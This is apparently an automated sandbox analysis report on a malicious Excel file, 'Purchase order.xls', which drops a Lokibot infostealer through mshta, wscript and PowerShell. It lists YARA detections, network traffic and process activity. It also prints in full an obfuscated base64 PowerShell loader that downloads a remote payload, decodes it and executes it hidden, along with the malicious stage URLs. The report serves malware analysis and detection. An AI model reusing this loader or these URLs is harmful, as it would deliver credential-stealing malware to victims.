                Source: mshta.exe, 00000008.00000002.491361921.000000000018F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003841000.00000004.00000020.00020000.00000000.sdmp, Purchase order.xls, 23530000.0.drString found in binary or memory: https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&wa
                Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49169 version: TLS 1.2
                Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 1668, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3804, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: aspnet_regbrowsers.exe PID: 3900, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Purchase order.xlsOLE: Microsoft Excel 2007+
                Source: Purchase order.xlsOLE: Microsoft Excel 2007+
                Source: Purchase order.xlsOLE: Microsoft Excel 2007+
                Source: 23530000.0.drOLE: Microsoft Excel 2007+
                Source: 23530000.0.drOLE: Microsoft Excel 2007+
                Source: 23530000.0.drOLE: Microsoft Excel 2007+
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithgoodnewsgivenbygodthingsgreat[1].htaJump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_0040549C26_2_0040549C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_004029D426_2_004029D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_012723B026_2_012723B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_0127316026_2_01273160
                Source: Purchase order.xlsOLE indicator, VBA macros: true
                Source: Purchase order.xlsStream path 'MBD000EE997/\x1Ole' : https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddlej1/gR4sflG{QtQ"y&~;!<-DT@4?lU}.30ZAwZ)|eEs=0.TWracBwl>ti3sA|186s4|yMSd[Z5lzpIxHYrIwUzJ4v1veikUI0F4V7ebSjlnle1bz61TbA3JL7hqwvx30HlolH1UkCZ4Uvri9hB5LgcTzmllxTe3iY7s0F1MbhMu0b2fI5hMZ8xIY*-nRjt^c}
                Source: 23530000.0.drStream path 'MBD000EE997/\x1Ole' : https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddlej1/gR4sflG{QtQ"y&~;!<-DT@4?lU}.30ZAwZ)|eEs=0.TWracBwl>ti3sA|186s4|yMSd[Z5lzpIxHYrIwUzJ4v1veikUI0F4V7ebSjlnle1bz61TbA3JL7hqwvx30HlolH1UkCZ4Uvri9hB5LgcTzmllxTe3iY7s0F1MbhMu0b2fI5hMZ8xIY*-nRjt^c}
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: String function: 00405B6F appears 42 times
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2214
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2214
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: Process Memory Space: powershell.exe PID: 1668, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3804, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: aspnet_regbrowsers.exe PID: 3900, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLS@29/44@6/5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,26_2_0040650A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 26_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,26_2_0040434D
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\23530000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB460.tmpJump to behavior
                Source: Purchase order.xlsOLE indicator, Workbook stream: true
                Source: 23530000.0.drOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.q.......q.......&.......................&.......&......................3........................&.............Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................q.....}..w......q......................1......(.P.....p.......x.......................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................q.......q.....}..w.............................1......(.P..............3......................`4E.............Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................DN.l....}..w....`4E.....\.......................(.P.....p.......x.......8...............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`4E.....}..w............."L......M.l.... .K.....(.P.....p.......x.......................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................DN.l....}..w....`4E.....\.......................(.P.....p.......x.......8...............................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`4E.....}..w............."L......M.l.... .K.....(.P.....p.......x.......................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.."L......M.l.... .K.....(.P.....p.......x............... .......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.E.V.I.C.E.C.r.E.D.E.N.t.i.a.L.D.E.P.l.o.y.m.e.n.T...E.X.e.p.......x...............@.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.p.......x...............@.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`4E.....}..w............."L......M.l.... .K.....(.P.....p.......x.......................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................`4E.....}..w............."L......M.l.... .K.....(.P.....p.......x...............l.......................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......`4E.....}..w............."L......M.l.... .K.....(.P.....p.......x.......................................Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............2.1.4.7.5.0.0.0.3.6.....................`m......hm.......................3......................`m..............
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................q.....}..w......q......................1......(.P.....................................................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................q.......q.....}..w.............................1......(.P..............3......................................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................~..l....}..w............\.......................(.P.....................................................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............. w........l....@.v.....(.P.....................................................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm......................~..l....}..w............\.......................(.P.....................................................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............. w........l....@.v.....(.P.....................................................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....H.......N.......................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.. w........l....@.v.....(.P.....................H....... .......................
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .D.E.V.I.C.E.C.r.E.D.E.N.t.i.a.L.D.E.P.l.o.y.m.e.n.T...E.X.e.................H.......@.......................
